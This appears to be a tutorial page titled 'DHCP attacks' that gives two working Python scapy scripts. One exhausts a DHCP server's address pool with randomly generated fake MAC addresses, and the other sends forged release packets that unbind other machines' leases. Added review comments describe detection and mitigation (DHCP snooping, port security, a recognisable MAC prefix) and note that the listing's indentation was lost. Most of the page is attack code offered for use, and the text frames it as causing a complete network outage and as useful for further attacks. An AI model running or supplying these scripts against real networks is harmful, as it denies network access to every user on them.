DHCP attacks
Rogue DHCP server
(+)This is a rogue dhcp server.
(+)It requests IP addresses for fake MAC addresses, and the DHCP server assigns an IP address to each of those MACs.
(+)The MAC addresses are randomly created using this tool.
(+)Each generated MAC address and the IP address assigned to it are saved to the "dhcpiplist.txt" file.
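As a result, DHCP starvation occurs: the DHCP server can no longer lease new IP addresses to the network, which leads to a complete network outage. On managed switches, DHCP snooping with rate limiting and a per-port MAC address limit (port security) are the usual controls against this.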
from scapy.all import *
import random
import subprocess
# NOTE(review): the indentation of this listing was lost when the page was
# extracted; the code lines are kept exactly as published, so the loop body
# below (presumably the six statements after the `for`) is no longer marked.
# The script is Python 2 (raw_input here, print statements further down).
#
# Setup phase: builds one (transaction id, MAC) pair per fake DHCP client.
# Nothing is sent on the network in this part.

# Turn off scapy's check that a reply's source IP matches the address the
# request was sent to: the DISCOVER goes to the broadcast address while the
# answer comes from the server's own address.
conf.checkIPaddr = False
# Three parallel lists, one entry per fake client:
#   x_idval   - BOOTP transaction ids
#   hw_strval - MAC addresses packed by mac2str (used as BOOTP chaddr)
#   hwval     - the same MAC addresses as text (used as Ethernet source)
x_idval = []
hw_strval = []
hwval=[]
# Number of fake clients to create; int() below raises ValueError when the
# input is not a whole number.
attacks = raw_input("Type how many IPs do you need to assign : ")
for i in range(int(attacks)):
# Random transaction id in the range 1..999999.
x_id = random.randrange(1,1000000)
x_idval.append(x_id)
# Only the last three octets are random; every generated MAC keeps the fixed
# prefix 00:00:5e. For a defender that shared prefix on many new "clients"
# appearing at once is a simple signature to look for in DHCP server logs and
# switch MAC tables.
hw = "00:00:5e"+str(RandMAC())[8:]
hwval.append(hw)
hw_str = mac2str(hw)
hw_strval.append(hw_str)
# Not read by any later statement in this listing; discovery() binds its own
# local `ans`.
ans=[]
# discovery(xidfun, hwfun, hwstrfun): run one DHCP DISCOVER / REQUEST exchange
# for a single fake client and return the address the server offered.
#
#   xidfun   - BOOTP transaction id used in both messages
#   hwfun    - MAC address as text, used as the Ethernet source address
#   hwstrfun - the same MAC in packed form, used as BOOTP chaddr
#
# The script acts as a DHCP *client*: it only sends DISCOVER and REQUEST and
# never answers other hosts' DHCP traffic.
#
# What this looks like on the wire (useful for detection): broadcast frames
# from UDP port 68 to 67, IP source 0.0.0.0, where both the Ethernet source
# and chaddr are the fake MAC. Because the frame source changes per client, a
# per-port MAC address limit (port security) and DHCP snooping rate limits on
# the access port are the controls that see this traffic.
#
# NOTE(review): indentation was lost in extraction, so the nesting of the two
# loops and of the `if ans:` bodies cannot be read from the text; the code
# lines are kept exactly as published.
def discovery(xidfun, hwfun, hwstrfun):
done = False
# Repeat the DISCOVER until at least one answer arrives.
while not done:
dhcppack = Ether(dst="ff:ff:ff:ff:ff:ff",src=hwfun)/IP(proto = "udp",src="0.0.0.0", dst="255.255.255.255")/UDP(sport=68, dport=67)/BOOTP(xid=xidfun, chaddr=hwstrfun)/DHCP(options=[("message-type","discover"),("end")])
# "eth0" is hard-coded and passed positionally - presumably the interface
# name; each attempt waits up to 2.5 seconds for an answer.
ans, unans = srp(dhcppack, "eth0", timeout = 2.5, verbose=1)
if ans:
done = True
# yiaddr of the first answer is the address being offered.
givenip= ans[0][1][BOOTP].yiaddr
# These two values are read by fixed position in the answer's option list,
# not by option name, so what they contain depends on the order in which the
# server sent its options. `gateway` is later sent as server_id;
# `domainname` is not used again in this listing.
gateway = ans[0][1][DHCP].options[7][1]
domainname = ans[0][1][DHCP].options[9][1]
reqdone = False
# Repeat the REQUEST for the offered address until it is answered.
while not reqdone:
dhcpreq = Ether(dst="ff:ff:ff:ff:ff:ff",src=hwfun)/IP(proto = "udp",src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68, dport=67)/BOOTP(xid=xidfun , chaddr=hwstrfun)/DHCP(options=[("message-type","request"),("server_id", gateway),("requested_addr",givenip),("end")])
ans, unans = srp(dhcpreq, "eth0", timeout = 2.5, verbose=1)
if ans:
reqdone = True
# The content of the second answer is not inspected; any reply ends the loop.
return givenip
# Main loop: one discovery() call per fake client, with every MAC/IP pair
# written to dhcpiplist.txt in the current working directory.
# For incident response, that file on a suspect host is a direct record of
# which leases were taken and under which MAC addresses.
#
# NOTE(review): indentation was lost in extraction; the loop body is
# presumably the four statements after the `for`. Code lines are unchanged.

# Mode "w" truncates an existing file; the handle is never closed in this
# listing.
fp = open("dhcpiplist.txt","w")
# j = transaction id, k = packed MAC, l = MAC as text; discovery() takes them
# in the order (xid, text MAC, packed MAC).
for j,k,l in zip(x_idval,hw_strval,hwval):
iptken = discovery(j,l,k)
print "MAC of : "+l+" , assigned IP is : ",iptken
# ipgot is not used afterwards; the file line below concatenates iptken
# directly.
ipgot = str(iptken)
# Line format "MAC : <mac>, IP : <ip>".
print >>fp, "MAC : "+l+", IP : "+iptken
print "\n\n**** Find the dhcpiplist.txt file in current directory to see what are the IPs and MACs taken ****"
Forced release DHCP IP
(+)This tool will release the IP addresses on dhcp server.
(+)It is true that a host can release its own lease by typing ipconfig /release (on Windows) or dhclient -r (on Linux), but that
releases only that host's own IP. What if you need to release other machines' IPs? This tool does that:
it can unassign (release) an IP address that belongs to another machine on your network. This
is very useful for various attacks.
(+)List each IP address after its MAC address in the dhcpiplist.txt file. The listed IPs will be unbound from those MACs.
from scapy.all import *
import re
# Parallel lists filled from dhcpiplist.txt further down: maclst holds the MAC
# address found on each line, iplst the IP address found on the same line.
maclst =[]
iplst = []
# relpack(ip, hw): send one DHCPRELEASE that claims to come from the client
# with address `ip` and MAC `hw`. Returns nothing.
#
#   ip - used as both the IP source address and BOOTP ciaddr
#   hw - MAC as text; packed with mac2str and used as BOOTP chaddr
#
# The server address 192.168.100.254 is hard-coded twice: as the IP
# destination and as the server_id option.
#
# Detection and mitigation notes: the packet is built without an Ether layer
# and handed to send(), so this code does not set the frame's source MAC to
# `hw`. A release whose Ethernet source differs from chaddr, or that arrives
# on a different switch port than the one where the lease was learned, is the
# thing to alert on; DHCP snooping implementations typically compare release
# messages against their binding table for this reason.
#
# NOTE(review): indentation was lost in extraction; code lines are unchanged.
def relpack(ip, hw):
hwstr = mac2str(hw)
# Fresh random transaction id in 1..999999 for each release.
x_id = random.randrange(1,1000000)
relpacket = IP(src=ip, dst="192.168.100.254")/UDP(sport=68, dport=67)/BOOTP(chaddr=hwstr,ciaddr = ip,xid=x_id )/DHCP(options=[("message-type","release"),("server_id", "192.168.100.254"),("end")])
# `done` is assigned but never read.
done = False
# Sent once; no reply is awaited or checked.
send(relpacket, verbose = 1)
# Read dhcpiplist.txt and call relpack() for every MAC/IP pair found in it.
#
# NOTE(review): indentation was lost in extraction; presumably the first loop
# body is the four statements after `for line in fp:` and the second loop body
# is the two statements after the second `for`. Code lines are unchanged.

# The handle is never closed in this listing.
fp = open("dhcpiplist.txt","r")
for line in fp:
# First dotted-quad and first colon-separated six-group token on the line.
# The patterns check shape only: they do not limit octets to 0-255, and \w
# accepts any word character, not just hex digits.
ip = re.findall(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}",line)
mac = re.findall(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w",line)
# ip[0] / mac[0] raise IndexError on a line with no match (for example a blank
# line).
iplst.append(ip[0])
maclst.append(mac[0])
# One release per pair, followed by a console line naming the pair.
for hwadd, ipadd in zip(maclst,iplst):
relpack(ipadd, hwadd)
print hwadd+" mac and "+ipadd+" ip released"
Replace 192.168.100.254 with DHCP server IP.